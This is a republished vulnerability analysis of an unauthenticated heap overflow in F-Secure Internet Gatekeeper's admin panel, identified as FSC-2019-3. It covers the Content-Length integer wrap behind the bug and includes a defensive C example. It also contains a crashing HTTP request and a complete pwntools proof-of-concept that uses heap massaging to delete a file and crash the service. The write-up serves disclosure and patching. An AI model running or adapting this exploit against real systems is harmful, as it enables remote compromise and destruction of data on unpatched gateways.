Shulou (Shulou.com), SLTechnology News & Howtos > Network Security, 05/31 report, updated 2025-02-23
This article explains in detail how to analyze the heap overflow vulnerability in F-Secure Internet Gatekeeper. The content is of high quality, so the editor shares it for your reference; I hope you will have a good understanding of the relevant knowledge after reading it.
Introduction to the F-Secure Internet Gatekeeper heap overflow vulnerability
In this article we analyze a heap overflow vulnerability in the F-Secure Internet Gatekeeper application and explain why a simple mistake leads to an exploitable, unauthenticated remote code execution vulnerability.
Setting up the reproduction environment
In our lab, all vulnerability reproduction and testing were carried out in a CentOS virtual machine configured with at least 1 processor and 4 GB of RAM.
Next, download F-Secure Internet Gatekeeper. Note that the vendor has since removed the vulnerable version from its download site.
The SHA256 of the affected package is:
1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26
Installation steps:
1. If you are using the x64 version of CentOS, first install the 32-bit C library:
yum install glibc.i686
2. Then install F-Secure Internet Gatekeeper from the downloaded package:
rpm -i <package>.rpm
3. To facilitate debugging, install gdb 8+ and GEF.
Now we can use Ghidra, IDA, or another disassembler/decompiler to reverse engineer F-Secure Internet Gatekeeper.
Vulnerability analysis
According to the information provided by F-Secure, F-Secure Internet Gatekeeper is an "efficient and easy to manage enterprise network gateway-level security solution".
F-Secure Internet Gatekeeper includes an administrator control panel listening on port 9012/tcp that is used to manage all of the product's services and rules, such as the HTTP proxy, the IMAP proxy, and so on. The panel is accessed over HTTP and is served by the fsikgwebui binary, which is written in C. In fact, the whole web server is written in C/C++, and some of its components reuse CivetWeb code, so we can assume the server is a customized version of CivetWeb.
Since the server is written in C/C++, we can look for memory corruption vulnerabilities, because applications written in these languages frequently suffer from this class of bug.
Here we chose Fuzzotron to fuzz the administrator control panel. Fuzzotron is a powerful fuzzing tool that uses Radamsa as its mutation engine and has built-in TCP support, which makes fuzzing network services convenient. As the test case we chose a valid POST request that changes the control panel's language setting; an unauthenticated user can send this request, so it suits our test scenario well.
Analyzing the mutated inputs produced by Radamsa, we saw that the crash is related to the Content-Length header. The header value in the crashing test case was Content-Length: 21487483844, which suggests that an integer handling error is behind the overflow.
Debugging the test case in gdb, we found the crashing code in the fs_httpd_civetweb_callback_begin_request function, which handles incoming connections and dispatches each request to the relevant handler according to the HTTP method, the request path, or the cookie.
To reproduce the vulnerability, we send a POST request to port 9012, used by the administrator control panel, with a very large Content-Length header value:
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA
The target application parses the request and calls the fs_httpd_get_header function to retrieve the Content-Length value. That string is then passed to the strtoul function, which converts it to an unsigned long integer.
The pseudo code corresponding to the above control flow is as follows:
content_len_old = fs_httpd_get_header(header_struct, "Content-Length");
if (content_len_old) {
    content_len_new = strtoul(content_len_old, 0, 10);
}
The strtoul function returns an unsigned long integer, whose maximum value on a 32-bit system is 2^32 - 1.
Because the Content-Length we supply does not fit in an unsigned long, strtoul returns ULONG_MAX (the value saturates on overflow), which on a 32-bit system is 0xFFFFFFFF.
When the fs_httpd_civetweb_callback_begin_request function tries to allocate space for the body with malloc, it first adds 1 to the content length and then calls malloc.
The corresponding pseudo code is as follows:
// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1);
Because 0xFFFFFFFF + 1 overflows a 32-bit integer, the result wraps to 0x00000000, so malloc is asked to allocate a 0-byte region.
When malloc(0) is called, it returns a valid heap pointer to the smallest possible chunk (0x10 bytes).
Further analysis shows that the mg_read function is then called with the original, un-incremented length:
// content_len_new is without the addition of 0x1,
// so content_len_new == 0xFFFFFFFF
if (content_len_new) {
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new);
}
After the overflow, the code above reads an unbounded amount of data into that tiny heap chunk with no length check, which is very convenient for exploitation. We can stop writing data to the HTTP stream at any point; the target then simply closes the connection and continues its normal flow, so we have complete control over how much data is written and what it contains.
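The integer error described above (strtoul saturating to ULONG_MAX, the unchecked +1 wrapping to 0, and mg_read being bounded by a different value than the allocation) is easy to see in isolation, and just as easy to prevent. The following C program is an added example, not code from the article or from F-Secure's product: it emulates the 32-bit strtoul behaviour on any host, computes the two mismatched sizes the vulnerable pseudo code would use for the article's Content-Length value, and then shows a hardened parser and handler that reject the same header. The names strtoul_32bit, vulnerable_alloc_size, vulnerable_read_len, parse_content_length, hardened_handle and the MAX_BODY_LEN cap are all assumptions chosen for the demonstration; nothing is written out of bounds here, the vulnerable path only reports the numbers it would have used.

```c
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical upper bound on a body this handler is willing to buffer (assumption). */
#define MAX_BODY_LEN (16u * 1024u * 1024u)

/* Emulates strtoul() on a 32-bit build regardless of host word size: an
 * out-of-range value saturates to 0xFFFFFFFF (ULONG_MAX there) with
 * errno = ERANGE, the behaviour the article observes. */
static uint32_t strtoul_32bit(const char *s)
{
    unsigned long long v;
    errno = 0;
    v = strtoull(s, NULL, 10);
    if (errno == ERANGE || v > 0xFFFFFFFFull) {
        errno = ERANGE;
        return 0xFFFFFFFFu;
    }
    return (uint32_t)v;
}

/* Size the vulnerable pseudo code hands to fs_malloc: content_len_new + 1
 * with no overflow check, so 0xFFFFFFFF + 1 wraps to 0 and malloc(0) is
 * called. Nothing is allocated here; only the number is computed. */
static uint32_t vulnerable_alloc_size(const char *content_length)
{
    uint32_t content_len_new = strtoul_32bit(content_length);
    return content_len_new + 1;
}

/* Length the vulnerable code later passes to mg_read: the un-incremented
 * value, so the read bound no longer matches the allocation. */
static uint32_t vulnerable_read_len(const char *content_length)
{
    return strtoul_32bit(content_length);
}

enum { CL_OK = 0, CL_MALFORMED = -1, CL_TOO_LARGE = -2 };

/* Hardened parser: accepts only 1*DIGIT (RFC 7230), detects strtoull's own
 * overflow via errno, and caps the value so that len + 1 can never wrap. */
static int parse_content_length(const char *hdr, uint32_t *out)
{
    char *end;
    unsigned long long v;

    /* strtoull silently accepts leading whitespace and a sign; reject both. */
    if (hdr == NULL || !isdigit((unsigned char)hdr[0]))
        return CL_MALFORMED;
    errno = 0;
    v = strtoull(hdr, &end, 10);
    if (*end != '\0')                         /* trailing junk, e.g. "27abc" */
        return CL_MALFORMED;
    if (errno == ERANGE || v > MAX_BODY_LEN)  /* saturated or over the policy cap */
        return CL_TOO_LARGE;
    *out = (uint32_t)v;
    return CL_OK;
}

/* Simulated request handler using the hardened parser: the body buffer is
 * len + 1 bytes and the copy is bounded by both len and the bytes actually
 * received, the way a bounded read should be. Returns an HTTP status code. */
static int hardened_handle(const char *content_length, const char *body, size_t body_len)
{
    uint32_t len;
    size_t to_copy;
    char *buf;
    int rc = parse_content_length(content_length, &len);

    if (rc == CL_MALFORMED)
        return 400;
    if (rc == CL_TOO_LARGE)
        return 413;
    buf = malloc((size_t)len + 1);
    if (buf == NULL)
        return 500;
    to_copy = body_len < len ? body_len : len;
    memcpy(buf, body, to_copy);
    buf[to_copy] = '\0';
    free(buf);
    return 200;
}

int main(void)
{
    /* Constructed input: the header value from the article's crashing test case. */
    const char *bad = "21487483844";
    printf("vulnerable path: malloc(%u) but mg_read bound %u\n",
           vulnerable_alloc_size(bad), vulnerable_read_len(bad));
    printf("hardened path: status %d for Content-Length: %s\n", hardened_handle(bad, "AAAA", 4), bad);
    printf("hardened path: status %d for Content-Length: 4\n", hardened_handle("4", "AAAA", 4));
    return 0;
}
```

Running it prints malloc(0) against a read bound of 4294967295 for the vulnerable path and a 413 for the hardened one. The important design point is that the check happens on the parsed value before any arithmetic: once the value is known to be at most MAX_BODY_LEN, len + 1 cannot wrap, and passing the same len to both the allocation and the read keeps the two bounds identical by construction.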
Exploit PoC
The proof-of-concept script (Python 2, pwntools) as published with the analysis:

from pwn import *
import time
import sys

# argv[1] is the target host, argv[2] the filename used during heap massaging
def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r

def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12                 # Padding
    payload += p32(0x1d)                # Fast bin chunk overwrite
    payload += "A" * 488                # Padding
    payload += p32(0xdda00771)          # Address of payload
    payload += p32(0xdda00771 + 4)      # Junk
    r = send_payload(payload)

def massage_heap(filename):
    print "Trying to massage the heap....."
    for x in xrange(100):
        payload = ""
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0xdda0077d)      # Points to where the filename will be in memory
        payload += filename + "\x00"
        payload += "C" * (0x300 - len(payload))
        r = send_payload(payload, content_len=0x80000, nofun=True)
        r.close()
        cut_conn = True
    print "Heap massage done"

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{}".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
Vulnerability fix
F-Secure assigned this security issue the identifier FSC-2019-3 and fixed it in F-Secure Internet Gatekeeper v5.40-5.50 hotfix 8 (2019-07-11).
This concludes our analysis of the F-Secure Internet Gatekeeper heap overflow vulnerability. I hope the above content has been helpful and that you have learned something from it. If you found the article useful, please share it so that more people can read it.